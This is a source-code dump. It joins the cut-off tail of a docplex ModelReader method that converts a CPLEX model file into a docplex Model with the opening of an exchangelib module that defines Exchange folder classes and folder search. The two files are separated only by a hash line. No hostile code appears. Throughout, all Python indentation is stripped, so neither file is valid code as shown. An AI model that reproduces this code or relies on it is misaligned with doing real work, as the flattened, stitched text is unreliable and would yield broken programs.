The returned model is built using this model_class and the keyword arguments kwargs, if any.
By default, the model is class is `Model` (see
kwargs: A dict of keyword-based arguments that are used when creating the model
instance.
Example:
`m = read_model("c:/temp/foo.mps", model_name="docplex_foo", solver_agent="docloud", output_level=100)`
Returns:
An instance of Model, or None if an exception is raised.
See Also:
:class:`docplex.mp.model.Model`
"""
if not os.path.exists(filename):
raise IOError("* file not found: {0}".format(filename))
# extract basename
if model_name:
name_to_use = model_name
else:
basename = os.path.basename(filename)
if '.' not in filename:
raise RuntimeError('ModelReader.read_model(): path has no extension: {}'.format(filename))
dotpos = basename.find(".")
if dotpos > 0:
name_to_use = basename[:dotpos]
else: # pragma: no cover
name_to_use = basename
model_class = model_class or Model
if 0 == os.stat(filename).st_size:
print("* file is empty: {0} - exiting".format(filename))
return model_class(name=name_to_use, **kwargs)
if verbose:
print("-> CPLEX starts reading file: {0}".format(filename))
cpx_adapter = cls._read_cplex(filename)
cpx = cpx_adapter.cpx
if verbose:
print("<- CPLEX finished reading file: {0}".format(filename))
if not cpx: # pragma: no cover
return None
final_output_level = kwargs.get("output_level", "info")
debug_read = kwargs.get("debug", False)
try:
# force no tck
if 'checker' in kwargs:
final_checker = kwargs['checker']
else:
final_checker = 'default'
# build the model with no checker, then restore final_checker in the end.
kwargs['checker'] = 'off'
ignore_names = kwargs.get('ignore_names', False)
# -------------
mdl = model_class(name=name_to_use, **kwargs)
lfactory = mdl._lfactory
qfactory = mdl._qfactory
mdl.set_quiet() # output level set to ERROR
vartype_cont = mdl.continuous_vartype
vartype_map = {'B': mdl.binary_vartype,
'I': mdl.integer_vartype,
'C': mdl.continuous_vartype,
'S': mdl.semicontinuous_vartype}
# 1 upload variables
cpx_nb_vars = cpx.variables.get_num()
def make_constant_expr(k):
if k:
return lfactory._new_safe_constant_expr(k)
else:
return lfactory.new_zero_expr()
if verbose:
print("-- uploading {0} variables...".format(cpx_nb_vars))
cpx_var_names = [] if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx.variables.get_names)
if cpx._is_MIP():
cpx_vartypes = [vartype_map.get(cpxt, vartype_cont) for cpxt in cpx.variables.get_types()]
else:
cpx_vartypes = [vartype_cont] * cpx_nb_vars
cpx_var_lbs = cpx.variables.get_lower_bounds()
cpx_var_ubs = cpx.variables.get_upper_bounds()
# map from cplex variable indices to docplex's
# use to skip range vars
# cplex : [x, Rg1, y] -> {0:0, 2: 1}
if cpx_var_names:
model_varnames = cpx_var_names
else:
model_varnames = [None] * cpx_nb_vars
model_lbs = cpx_var_lbs
model_ubs = cpx_var_ubs
model_types = cpx_vartypes
# vars
model_vars = lfactory.new_multitype_var_list(cpx_nb_vars,
model_types,
model_lbs,
model_ubs,
model_varnames)
# inverse map from indices to docplex vars
cpx_var_index_to_docplex = {v: model_vars[v] for v in range(cpx_nb_vars)}
# 2. upload linear constraints and ranges (mixed in cplex)
cpx_linearcts = cpx.linear_constraints
nb_linear_cts = cpx_linearcts.get_num()
# all_rows1 = cpx_linearcts.get_rows()
all_rows = cpx_adapter.fast_get_rows(cpx)
all_rhs = cpx_linearcts.get_rhs()
all_senses = cpx_linearcts.get_senses()
all_range_values = cpx_linearcts.get_range_values()
cpx_ctnames = [] if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx_linearcts.get_names)
deferred_cts = []
if verbose:
print("-- uploading {0} linear constraints...".format(nb_linear_cts))
for c in range(nb_linear_cts):
row = all_rows[c]
sense = all_senses[c]
rhs = all_rhs[c]
ctname = cpx_ctnames[c] if cpx_ctnames else None
range_val = all_range_values[c]
indices, coefs = row
expr = cls._make_expr_from_varmap_coefs(lfactory, cpx_var_index_to_docplex, indices, coefs)
if sense == 'R':
# rangeval can be negative !!! issue 52
if range_val >= 0:
range_lb = rhs
range_ub = rhs + range_val
else:
range_ub = rhs
range_lb = rhs + range_val
rgct = mdl.range_constraint(lb=range_lb, ub=range_ub, expr=expr, rng_name=ctname)
deferred_cts.append(rgct)
else:
op = cls.parse_sense(sense)
rhs_expr = make_constant_expr(rhs)
ct = LinearConstraint(mdl, expr, op, rhs_expr, ctname)
deferred_cts.append(ct)
if deferred_cts:
# add constraint as a block
lfactory._post_constraint_block(posted_cts=deferred_cts)
# 3. upload Quadratic constraints
cpx_quadraticcts = cpx.quadratic_constraints
nb_quadratic_cts = cpx_quadraticcts.get_num()
if nb_quadratic_cts:
all_rhs = cpx_quadraticcts.get_rhs()
all_linear_nb_non_zeros = cpx_quadraticcts.get_linear_num_nonzeros()
all_linear_components = cpx_quadraticcts.get_linear_components()
all_quadratic_nb_non_zeros = cpx_quadraticcts.get_quad_num_nonzeros()
all_quadratic_components = cpx_quadraticcts.get_quadratic_components()
all_senses = cpx_quadraticcts.get_senses()
cpx_ctnames = [] if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx_quadraticcts.get_names)
for c in range(nb_quadratic_cts):
rhs = all_rhs[c]
linear_nb_non_zeros = all_linear_nb_non_zeros[c]
linear_component = all_linear_components[c]
quadratic_nb_non_zeros = all_quadratic_nb_non_zeros[c]
quadratic_component = all_quadratic_components[c]
sense = all_senses[c]
ctname = cpx_ctnames[c] if cpx_ctnames else None
if linear_nb_non_zeros > 0:
indices, coefs = linear_component.unpack()
# linexpr = mdl._aggregator._scal_prod((cpx_var_index_to_docplex[idx] for idx in indices), coefs)
linexpr = cls._make_expr_from_varmap_coefs(lfactory, cpx_var_index_to_docplex, indices, coefs)
else:
linexpr = None
if quadratic_nb_non_zeros > 0:
qfactory = mdl._qfactory
ind1, ind2, coefs = quadratic_component.unpack()
quads = qfactory.term_dict_type()
for idx1, idx2, coef in izip(ind1, ind2, coefs):
quads[VarPair(cpx_var_index_to_docplex[idx1], cpx_var_index_to_docplex[idx2])] = coef
else: # pragma: no cover
# should not happen, but who knows
quads = None
quad_expr = mdl._aggregator._quad_factory.new_quad(quads=quads, linexpr=linexpr, safe=True)
op = ComparisonType.cplex_ctsense_to_python_op(sense)
ct = op(quad_expr, rhs)
mdl.add_constraint(ct, ctname)
# 4. upload indicators
cpx_indicators = cpx.indicator_constraints
nb_indicators = cpx_indicators.get_num()
if nb_indicators:
all_ind_names = [] if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx_indicators.get_names)
all_ind_bvars = cpx_indicators.get_indicator_variables()
all_ind_rhs = cpx_indicators.get_rhs()
all_ind_linearcts = cpx_indicators.get_linear_components()
all_ind_senses = cpx_indicators.get_senses()
all_ind_complemented = cpx_indicators.get_complemented()
all_ind_types = cpx_indicators.get_types()
ind_equiv_type = 3
for i in range(nb_indicators):
ind_bvar = all_ind_bvars[i]
ind_name = all_ind_names[i] if all_ind_names else None
ind_rhs = all_ind_rhs[i]
ind_linear = all_ind_linearcts[i] # SparsePair(ind, val)
ind_sense = all_ind_senses[i]
ind_complemented = all_ind_complemented[i]
ind_type = all_ind_types[i]
# 1 . check the bvar is ok
ind_bvar = cpx_var_index_to_docplex[ind_bvar]
# each var appears once
ind_linexpr = cls._build_linear_expr_from_sparse_pair(lfactory, cpx_var_index_to_docplex,
ind_linear)
op = ComparisonType.cplex_ctsense_to_python_op(ind_sense)
ind_lct = op(ind_linexpr, ind_rhs)
if ind_type == ind_equiv_type:
logct = lfactory.new_equivalence_constraint(
ind_bvar, ind_lct, true_value=1 - ind_complemented, name=ind_name)
else:
logct = lfactory.new_indicator_constraint(
ind_bvar, ind_lct, true_value=1 - ind_complemented, name=ind_name)
mdl.add(logct)
# 5. upload Piecewise linear constraints
try:
cpx_pwl = cpx.pwl_constraints
cpx_pwl_defs = cpx_pwl.get_definitions()
pwl_fallback_names = [""] * cpx_pwl.get_num()
cpx_pwl_names = pwl_fallback_names if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx_pwl.get_names,
pwl_fallback_names)
for (vary_idx, varx_idx, preslope, postslope, breakx, breaky), pwl_name in izip(cpx_pwl_defs,
cpx_pwl_names):
varx = cpx_var_index_to_docplex.get(varx_idx, None)
vary = cpx_var_index_to_docplex.get(vary_idx, None)
breakxy = [(brkx, brky) for brkx, brky in zip(breakx, breaky)]
pwl_func = mdl.piecewise(preslope, breakxy, postslope, name=pwl_name)
pwl_expr = mdl._lfactory.new_pwl_expr(pwl_func, varx, 0, add_counter_suffix=False, resolve=False)
pwl_expr._f_var = vary
pwl_expr._ensure_resolved()
except AttributeError: # pragma: no cover
pass # Do not check for PWLs if Cplex version does not support them
# 6. upload objective
# noinspection PyPep8
try:
cpx_multiobj = cpx.multiobj
except AttributeError: # pragma: no cover
# pre-12.9 version
cpx_multiobj = None
if cpx_multiobj is None or cpx_multiobj.get_num() <= 1:
cpx_obj = cpx.objective
cpx_sense = cpx_obj.get_sense()
cpx_all_lin_obj_coeffs = cpx_obj.get_linear()
all_obj_vars = []
all_obj_coefs = []
for v in range(cpx_nb_vars):
if v in cpx_var_index_to_docplex:
obj_coeff = cpx_all_lin_obj_coeffs[v]
all_obj_coefs.append(obj_coeff)
all_obj_vars.append(cpx_var_index_to_docplex[v])
# obj_expr = mdl._aggregator._scal_prod(all_obj_vars, all_obj_coefs)
obj_expr = cls._make_expr_from_vars_coefs(mdl, all_obj_vars, all_obj_coefs)
if cpx_obj.get_num_quadratic_variables() > 0:
cpx_all_quad_cols_coeffs = cpx_obj.get_quadratic()
quads = qfactory.term_dict_type()
for v, col_coefs in izip(cpx_var_index_to_docplex, cpx_all_quad_cols_coeffs):
var1 = cpx_var_index_to_docplex[v]
indices, coefs = col_coefs.unpack()
for idx, coef in izip(indices, coefs):
vp = VarPair(var1, cpx_var_index_to_docplex[idx])
quads[vp] = quads.get(vp, 0) + coef / 2
obj_expr += qfactory.new_quad(quads=quads, linexpr=None)
obj_expr += cpx.objective.get_offset()
is_maximize = cpx_sense == cpx_adapter.cplex_module._internal._subinterfaces.ObjSense.maximize
if is_maximize:
mdl.maximize(obj_expr)
else:
mdl.minimize(obj_expr)
else:
# we have multiple objective
nb_multiobjs = cpx_multiobj.get_num()
exprs = [0] * nb_multiobjs
priorities = [1] * nb_multiobjs
weights = [1] * nb_multiobjs
abstols = [0] * nb_multiobjs
reltols = [0] * nb_multiobjs
names = cpx_multiobj.get_names()
for m in range(nb_multiobjs):
(obj_coeffs, obj_offset, weight, prio, abstol, reltol) = cpx_multiobj.get_definition(m)
obj_expr = cls._make_expr_from_coef_vector(mdl, cpx_var_index_to_docplex, obj_coeffs, obj_offset)
exprs[m] = obj_expr
priorities[m] = prio
weights[m] = weight
abstols[m] = abstol
reltols[m] = reltol
sense = cpx_multiobj.get_sense()
mdl.set_multi_objective(sense, exprs, priorities, weights, abstols, reltols, names)
# upload sos
cpx_sos = cpx.SOS
cpx_sos_num = cpx_sos.get_num()
if cpx_sos_num > 0:
cpx_sos_types = cpx_sos.get_types()
cpx_sos_indices = cpx_sos.get_sets()
cpx_sos_names = cpx_sos.get_names()
if not cpx_sos_names:
cpx_sos_names = [None] * cpx_sos_num
for sostype, sos_sparse, sos_name in izip(cpx_sos_types, cpx_sos_indices, cpx_sos_names):
sos_var_indices = sos_sparse.ind
sos_weights = sos_sparse.val
isostype = int(sostype)
sos_vars = [cpx_var_index_to_docplex[var_ix] for var_ix in sos_var_indices]
mdl.add_sos(dvars=sos_vars, sos_arg=isostype, name=sos_name, weights=sos_weights)
# upload lazy constraints
cpx_linear_advanced = cpx.linear_constraints.advanced
cpx_lazyct_num = cpx_linear_advanced.get_num_lazy_constraints()
if cpx_lazyct_num:
print("WARNING: found {0} lazy constraints that cannot be uploaded to DOcplex".format(cpx_lazyct_num))
mdl.output_level = final_output_level
if final_checker:
# need to restore checker
mdl.set_checker(final_checker)
except cpx_adapter.CplexError as cpx_e: # pragma: no cover
print("* CPLEX error: {0!s} reading file {1}".format(cpx_e, filename))
mdl = None
if debug_read:
raise
except ModelReaderError as mre: # pragma: no cover
print("! Model reader error: {0!s} while reading file {1}".format(mre, filename))
mdl = None
if debug_read:
raise
except DOcplexException as doe: # pragma: no cover
print("! Internal DOcplex error: {0!s} while reading file {1}".format(doe, filename))
mdl = None
if debug_read:
raise
# except Exception as any_e: # pragma: no cover
# print("Internal exception raised: {0} msg={1!s} while reading file '{2}'".format(type(any_e), any_e, filename))
# mdl = None
# if debug_read:
# raise
finally:
# clean up CPLEX instance...
cpx.end()
return mdl
@classmethod
def read_model(cls, filename, model_name=None, verbose=False, model_class=None, **kwargs):
""" This method is a synonym of `read` for compatibility.
"""
import warnings
warnings.warn("ModelReader.read_model is deprecated, use class method ModelReader.read()", DeprecationWarning)
return cls.read(filename, model_name, verbose, model_class, **kwargs)
|
py | b403423959461025f61cde8fc909ce71d53c4084 | # coding=utf-8
from __future__ import unicode_literals
from fnmatch import fnmatch
import logging
from operator import attrgetter
import warnings
from cached_property import threaded_cached_property
from future.utils import python_2_unicode_compatible, PY2
from six import text_type, string_types
from .errors import ErrorAccessDenied, ErrorFolderNotFound, ErrorCannotEmptyFolder, ErrorCannotDeleteObject, \
ErrorNoPublicFolderReplicaAvailable, ErrorInvalidOperation, ErrorDeleteDistinguishedFolder, ErrorItemNotFound
from .fields import IntegerField, TextField, DateTimeField, FieldPath, EffectiveRightsField, MailboxField, IdField, \
EWSElementField, Field
from .items import Item, CalendarItem, Contact, Message, Task, MeetingRequest, MeetingResponse, MeetingCancellation, \
DistributionList, RegisterMixIn, Persona, ITEM_CLASSES, ITEM_TRAVERSAL_CHOICES, SHAPE_CHOICES, ID_ONLY, \
DELETE_TYPE_CHOICES, HARD_DELETE
from .properties import ItemId, Mailbox, EWSElement, ParentFolderId, InvalidField
from .queryset import QuerySet, SearchableMixIn
from .restriction import Restriction, Q
from .services import FindFolder, GetFolder, FindItem, CreateFolder, UpdateFolder, DeleteFolder, EmptyFolder, FindPeople
from .util import TNS, MNS
from .version import EXCHANGE_2007_SP1, EXCHANGE_2010_SP1, EXCHANGE_2013, EXCHANGE_2013_SP1
log = logging.getLogger(__name__)
# Traversal enums
SHALLOW = 'Shallow'
SOFT_DELETED = 'SoftDeleted'
DEEP = 'Deep'
FOLDER_TRAVERSAL_CHOICES = (SHALLOW, DEEP, SOFT_DELETED)
class FolderId(ItemId):
# MSDN: https://msdn.microsoft.com/en-us/library/office/aa579461(v=exchg.150).aspx
ELEMENT_NAME = 'FolderId'
__slots__ = ItemId.__slots__
class DistinguishedFolderId(ItemId):
# MSDN: https://msdn.microsoft.com/en-us/library/office/aa580808(v=exchg.150).aspx
ELEMENT_NAME = 'DistinguishedFolderId'
FIELDS = [
IdField('id', field_uri=ItemId.ID_ATTR, is_required=True),
IdField('changekey', field_uri=ItemId.CHANGEKEY_ATTR),
MailboxField('mailbox'),
]
__slots__ = ItemId.__slots__ + ('mailbox',)
def clean(self, version=None):
super(DistinguishedFolderId, self).clean(version=version)
if self.id == PublicFoldersRoot.DISTINGUISHED_FOLDER_ID:
# Avoid "ErrorInvalidOperation: It is not valid to specify a mailbox with the public folder root" from EWS
self.mailbox = None
class CalendarView(EWSElement):
"""
MSDN: https://msdn.microsoft.com/en-US/library/office/aa564515%28v=exchg.150%29.aspx
"""
ELEMENT_NAME = 'CalendarView'
NAMESPACE = MNS
FIELDS = [
DateTimeField('start', field_uri='StartDate', is_required=True, is_attribute=True),
DateTimeField('end', field_uri='EndDate', is_required=True, is_attribute=True),
IntegerField('max_items', field_uri='MaxEntriesReturned', min=1, is_attribute=True),
]
__slots__ = ('start', 'end', 'max_items')
def clean(self, version=None):
super(CalendarView, self).clean(version=version)
if self.end < self.start:
raise ValueError("'start' must be before 'end'")
class FolderCollection(SearchableMixIn):
def __init__(self, account, folders):
""" Implements a search API on a collection of folders
:param account: An Account object
:param folders: An iterable of folders, e.g. Folder.walk(), Folder.glob(), or [a.calendar, a.inbox]
"""
self.account = account
self._folders = folders
@threaded_cached_property
def folders(self):
# Resolve the list of folders, in case it's a generator
return list(self._folders)
def __len__(self):
return len(self.folders)
def __iter__(self):
for f in self.folders:
yield f
def get(self, *args, **kwargs):
return QuerySet(self).get(*args, **kwargs)
def all(self):
return QuerySet(self).all()
def none(self):
return QuerySet(self).none()
def filter(self, *args, **kwargs):
"""
Finds items in the folder(s).
Non-keyword args may be a list of Q instances.
Optional extra keyword arguments follow a Django-like QuerySet filter syntax (see
https://docs.djangoproject.com/en/1.10/ref/models/querysets/#field-lookups).
We don't support '__year' and other date-related lookups. We also don't support '__endswith' or '__iendswith'.
We support the additional '__not' lookup in place of Django's exclude() for simple cases. For more complicated
cases you need to create a Q object and use ~Q().
Examples:
my_account.inbox.filter(datetime_received__gt=EWSDateTime(2016, 1, 1))
my_account.calendar.filter(start__range=(EWSDateTime(2016, 1, 1), EWSDateTime(2017, 1, 1)))
my_account.tasks.filter(subject='Hi mom')
my_account.tasks.filter(subject__not='Hi mom')
my_account.tasks.filter(subject__contains='Foo')
my_account.tasks.filter(subject__icontains='foo')
'endswith' and 'iendswith' could be emulated by searching with 'contains' or 'icontains' and then
post-processing items. Fetch the field in question with additional_fields and remove items where the search
string is not a postfix.
"""
return QuerySet(self).filter(*args, **kwargs)
def exclude(self, *args, **kwargs):
return QuerySet(self).exclude(*args, **kwargs)
def view(self, start, end, max_items=None, *args, **kwargs):
""" Implements the CalendarView option to FindItem. The difference between filter() and view() is that filter()
only returns the master CalendarItem for recurring items, while view() unfolds recurring items and returns all
CalendarItem occurrences as one would normally expect when presenting a calendar.
Supports the same semantics as filter, except for 'start' and 'end' keyword attributes which are both required
and behave differently than filter. Here, they denote the start and end of the timespan of the view. All items
the overlap the timespan are returned (items that end exactly on 'start' are also returned, for some reason).
EWS does not allow combining CalendarView with search restrictions (filter and exclude).
'max_items' defines the maximum number of items returned in this view. Optional.
"""
qs = QuerySet(self).filter(*args, **kwargs)
qs.calendar_view = CalendarView(start=start, end=end, max_items=max_items)
return qs
def allowed_item_fields(self):
# Return non-ID fields of all item classes allowed in this folder type
fields = set()
for item_model in self.supported_item_models:
fields.update(set(item_model.supported_fields(version=self.account.version)))
return fields
@property
def supported_item_models(self):
return tuple(item_model for folder in self.folders for item_model in folder.supported_item_models)
def validate_item_field(self, field):
# For each field, check if the field is valid for any of the item models supported by this folder
for item_model in self.supported_item_models:
try:
item_model.validate_field(field=field, version=self.account.version)
break
except InvalidField:
continue
else:
raise InvalidField("%r is not a valid field on %s" % (field, self.supported_item_models))
def find_items(self, q, shape=ID_ONLY, depth=SHALLOW, additional_fields=None, order_fields=None,
calendar_view=None, page_size=None, max_items=None, offset=0):
"""
Private method to call the FindItem service
:param q: a Q instance containing any restrictions
:param shape: controls whether to return (id, chanegkey) tuples or Item objects. If additional_fields is
non-null, we always return Item objects.
:param depth: controls the whether to return soft-deleted items or not.
:param additional_fields: the extra properties we want on the return objects. Default is no properties. Be
aware that complex fields can only be fetched with fetch() (i.e. the GetItem service).
:param order_fields: the SortOrder fields, if any
:param calendar_view: a CalendarView instance, if any
:param page_size: the requested number of items per page
:param max_items: the max number of items to return
:param offset: the offset relative to the first item in the item collection
:return: a generator for the returned item IDs or items
"""
if shape not in SHAPE_CHOICES:
raise ValueError("'shape' %s must be one of %s" % (shape, SHAPE_CHOICES))
if depth not in ITEM_TRAVERSAL_CHOICES:
raise ValueError("'depth' %s must be one of %s" % (depth, ITEM_TRAVERSAL_CHOICES))
if not self.folders:
log.debug('Folder list is empty')
return
if additional_fields:
for f in additional_fields:
self.validate_item_field(field=f)
for f in additional_fields:
if f.field.is_complex:
raise ValueError("find_items() does not support field '%s'. Use fetch() instead" % f.field.name)
if calendar_view is not None and not isinstance(calendar_view, CalendarView):
raise ValueError("'calendar_view' %s must be a CalendarView instance" % calendar_view)
# Build up any restrictions
if q.is_empty():
restriction = None
query_string = None
elif q.query_string:
restriction = None
query_string = Restriction(q, folders=self.folders, applies_to=Restriction.ITEMS)
else:
restriction = Restriction(q, folders=self.folders, applies_to=Restriction.ITEMS)
query_string = None
log.debug(
'Finding %s items in folders %s (shape: %s, depth: %s, additional_fields: %s, restriction: %s)',
self.folders,
self.account,
shape,
depth,
additional_fields,
restriction.q if restriction else None,
)
items = FindItem(account=self.account, folders=self.folders, chunk_size=page_size).call(
additional_fields=additional_fields,
restriction=restriction,
order_fields=order_fields,
shape=shape,
query_string=query_string,
depth=depth,
calendar_view=calendar_view,
max_items=calendar_view.max_items if calendar_view else max_items,
offset=offset,
)
if shape == ID_ONLY and additional_fields is None:
for i in items:
yield i if isinstance(i, Exception) else Item.id_from_xml(i)
else:
for i in items:
if isinstance(i, Exception):
yield i
else:
yield Folder.item_model_from_tag(i.tag).from_xml(elem=i, account=self.account)
def _get_folder_fields(self):
additional_fields = set()
for folder in self.folders:
if isinstance(folder, Folder):
additional_fields.update(
FieldPath(field=f) for f in folder.supported_fields(version=self.account.version)
)
else:
additional_fields.update(
FieldPath(field=f) for f in Folder.supported_fields(version=self.account.version)
)
return additional_fields
def find_folders(self, q=None, shape=ID_ONLY, depth=DEEP, page_size=None, max_items=None, offset=0):
# 'depth' controls whether to return direct children or recurse into sub-folders
if not self.account:
raise ValueError('Folder must have an account')
if q is None or q.is_empty():
restriction = None
else:
restriction = Restriction(q, folders=self.folders, applies_to=Restriction.FOLDERS)
if shape not in SHAPE_CHOICES:
raise ValueError("'shape' %s must be one of %s" % (shape, SHAPE_CHOICES))
if depth not in FOLDER_TRAVERSAL_CHOICES:
raise ValueError("'depth' %s must be one of %s" % (depth, FOLDER_TRAVERSAL_CHOICES))
if not self.folders:
log.debug('Folder list is empty')
return []
additional_fields = self._get_folder_fields()
return FindFolder(account=self.account, folders=self.folders, chunk_size=page_size).call(
additional_fields=additional_fields,
restriction=restriction,
shape=shape,
depth=depth,
max_items=max_items,
offset=offset,
)
def get_folders(self):
if not self.folders:
log.debug('Folder list is empty')
return []
additional_fields = self._get_folder_fields()
return GetFolder(account=self.account).call(
folders=self.folders,
additional_fields=additional_fields,
shape=ID_ONLY,
)
@python_2_unicode_compatible
class Folder(RegisterMixIn, SearchableMixIn):
"""
MSDN: https://msdn.microsoft.com/en-us/library/office/aa581334(v=exchg.150).aspx
"""
ELEMENT_NAME = 'Folder'
NAMESPACE = TNS
DISTINGUISHED_FOLDER_ID = None # See https://msdn.microsoft.com/en-us/library/office/aa580808(v=exchg.150).aspx
# Default item type for this folder. See http://msdn.microsoft.com/en-us/library/hh354773(v=exchg.80).aspx
CONTAINER_CLASS = None
supported_item_models = ITEM_CLASSES # The Item types that this folder can contain. Default is all
# Marks the version from which a distinguished folder was introduced. A possibly authoritative source is:
# https://github.com/OfficeDev/ews-managed-api/blob/master/Enumerations/WellKnownFolderName.cs
supported_from = None
LOCALIZED_NAMES = dict() # A map of (str)locale: (tuple)localized_folder_names
ITEM_MODEL_MAP = {cls.response_tag(): cls for cls in ITEM_CLASSES}
FIELDS = [
IdField('id', field_uri=FolderId.ID_ATTR),
IdField('changekey', field_uri=FolderId.CHANGEKEY_ATTR),
EWSElementField('parent_folder_id', field_uri='folder:ParentFolderId', value_cls=ParentFolderId,
is_read_only=True),
TextField('folder_class', field_uri='folder:FolderClass', is_required_after_save=True),
TextField('name', field_uri='folder:DisplayName'),
IntegerField('total_count', field_uri='folder:TotalCount', is_read_only=True),
IntegerField('child_folder_count', field_uri='folder:ChildFolderCount', is_read_only=True),
IntegerField('unread_count', field_uri='folder:UnreadCount', is_read_only=True),
EffectiveRightsField('effective_rights', field_uri='folder:EffectiveRights', is_read_only=True),
]
# Used to register extended properties
INSERT_AFTER_FIELD = 'child_folder_count'
def __init__(self, **kwargs):
self.root = kwargs.pop('root', None) # This is a pointer to the root of the folder hierarchy
self.is_distinguished = kwargs.pop('is_distinguished', False)
parent = kwargs.pop('parent', None)
if parent:
if self.root:
if parent.root != self.root:
raise ValueError("'parent.root' must match 'root'")
else:
self.root = parent.root
if 'parent_folder_id' in kwargs:
if parent.id != kwargs['parent_folder_id']:
raise ValueError("'parent_folder_id' must match 'parent' ID")
kwargs['parent_folder_id'] = ParentFolderId(id=parent.id, changekey=parent.changekey)
if 'folder_id' in kwargs:
warnings.warn("The 'folder_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
kwargs['id'] = kwargs.pop('folder_id')
super(Folder, self).__init__(**kwargs)
@property
def folder_id(self):
warnings.warn("The 'folder_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
return self.id
@folder_id.setter
def folder_id(self, value):
warnings.warn("The 'folder_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
self.id = value
@classmethod
def get_field_by_fieldname(cls, fieldname):
if fieldname == 'folder_id':
warnings.warn("The 'folder_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
fieldname = 'id'
return super(Folder, cls).get_field_by_fieldname(fieldname)
@property
def is_deleteable(self):
return not self.is_distinguished
def clean(self, version=None):
# pylint: disable=access-member-before-definition
super(Folder, self).clean(version=version)
if self.root and not isinstance(self.root, RootOfHierarchy):
raise ValueError("'root' %r must be a RootOfHierarchy instance" % self.root)
# Set a default folder class for new folders. A folder class cannot be changed after saving.
if self.id is None and self.folder_class is None:
self.folder_class = self.CONTAINER_CLASS
@property
def parent(self):
if not self.parent_folder_id:
return None
if self.parent_folder_id.id == self.id:
# Some folders have a parent that references itself. Avoid circular references here
return None
return self.root.get_folder(self.parent_folder_id.id)
@parent.setter
def parent(self, value):
if value is None:
self.parent_folder_id = None
else:
if not isinstance(value, Folder):
raise ValueError("'value' %r must be a Folder instance" % value)
self.root = value.root
self.parent_folder_id = ParentFolderId(id=value.id, changekey=value.changekey)
@property
def children(self):
# It's dangerous to return a generator here because we may then call methods on a child that result in the
# cache being updated while it's iterated.
return FolderCollection(account=self.root.account, folders=self.root.get_children(self))
@property
def parts(self):
parts = [self]
f = self.parent
while f:
parts.insert(0, f)
f = f.parent
return parts
@property
def absolute(self):
return ''.join('/%s' % p.name for p in self.parts)
def _walk(self):
for c in self.children:
yield c
for f in c.walk():
yield f
def walk(self):
return FolderCollection(account=self.root.account, folders=self._walk())
def _glob(self, pattern):
split_pattern = pattern.rsplit('/', 1)
head, tail = (split_pattern[0], None) if len(split_pattern) == 1 else split_pattern
if head == '':
# We got an absolute path. Restart globbing at root
for f in self.root.glob(tail or '*'):
yield f
elif head == '..':
# Relative path with reference to parent. Restart globbing at parent
if not self.parent:
raise ValueError('Already at top')
for f in self.parent.glob(tail or '*'):
yield f
elif head == '**':
# Match anything here or in any subfolder at arbitrary depth
for c in self.walk():
if fnmatch(c.name, tail or '*'):
yield c
else:
# Regular pattern
for c in self.children:
if not fnmatch(c.name, head):
continue
if tail is None:
yield c
continue
for f in c.glob(tail):
yield f
def glob(self, pattern):
return FolderCollection(account=self.root.account, folders=self._glob(pattern))
def tree(self):
"""
Returns a string representation of the folder structure of this folder. Example:
root
├── inbox
│ └── todos
└── archive
├── Last Job
├── exchangelib issues
└── Mom
"""
tree = '%s\n' % self.name
children = list(self.children)
for i, c in enumerate(sorted(children, key=attrgetter('name')), start=1):
nodes = c.tree().split('\n')
for j, node in enumerate(nodes, start=1):
if i != len(children) and j == 1:
# Not the last child, but the first node, which is the name of the child
tree += '├── %s\n' % node
elif i != len(children) and j > 1:
# Not the last child, and not name of child
tree += '│ %s\n' % node
elif i == len(children) and j == 1:
# Not the last child, but the first node, which is the name of the child
tree += '└── %s\n' % node
else: # Last child, and not name of child
tree += ' %s\n' % node
return tree.strip()
@classmethod
def supports_version(cls, version):
# 'version' is a Version instance, for convenience by callers
if not cls.supported_from or not version:
return True
return version.build >= cls.supported_from
@property
def has_distinguished_name(self):
return self.name and self.DISTINGUISHED_FOLDER_ID and self.name.lower() == self.DISTINGUISHED_FOLDER_ID.lower()
@classmethod
def localized_names(cls, locale):
# Return localized names for a specific locale. If no locale-specific names exist, return the default names,
# if any.
return tuple(s.lower() for s in cls.LOCALIZED_NAMES.get(locale, cls.LOCALIZED_NAMES.get(None, [])))
@staticmethod
def folder_cls_from_container_class(container_class):
"""Returns a reasonable folder class given a container class, e.g. 'IPF.Note'. Don't iterate WELLKNOWN_FOLDERS
because many folder classes have the same CONTAINER_CLASS.
"""
for folder_cls in (
Messages, Tasks, Calendar, ConversationSettings, Contacts, GALContacts, Reminders, RecipientCache,
RSSFeeds):
if folder_cls.CONTAINER_CLASS == container_class:
return folder_cls
raise KeyError()
@classmethod
def item_model_from_tag(cls, tag):
try:
return cls.ITEM_MODEL_MAP[tag]
except KeyError:
raise ValueError('Item type %s was unexpected in a %s folder' % (tag, cls.__name__))
@classmethod
def allowed_item_fields(cls, version):
# Return non-ID fields of all item classes allowed in this folder type
fields = set()
for item_model in cls.supported_item_models:
fields.update(
set(item_model.supported_fields(version=version))
)
return fields
def validate_item_field(self, field):
# Takes a fieldname, Field or FieldPath object pointing to an item field, and checks that it is valid
# for the item types supported by this folder.
if field == 'item_id':
warnings.warn("The 'item_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
field = 'id'
version = self.root.account.version if self.root and self.root.account else None
# For each field, check if the field is valid for any of the item models supported by this folder
for item_model in self.supported_item_models:
try:
item_model.validate_field(field=field, version=version)
break
except InvalidField:
continue
else:
raise InvalidField("%r is not a valid field on %s" % (field, self.supported_item_models))
def normalize_fields(self, fields):
# Takes a list of fieldnames, Field or FieldPath objects pointing to item fields. Turns them into FieldPath
# objects and adds internal timezone fields if necessary. Assume fields are already validated.
from .version import EXCHANGE_2010
fields = list(fields)
has_start, has_end = False, False
for i, field_path in enumerate(fields):
if field_path == 'item_id':
warnings.warn("The 'item_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
field_path = 'id'
# Allow both Field and FieldPath instances and string field paths as input
if isinstance(field_path, string_types):
field_path = FieldPath.from_string(field_path=field_path, folder=self)
fields[i] = field_path
elif isinstance(field_path, Field):
field_path = FieldPath(field=field_path)
fields[i] = field_path
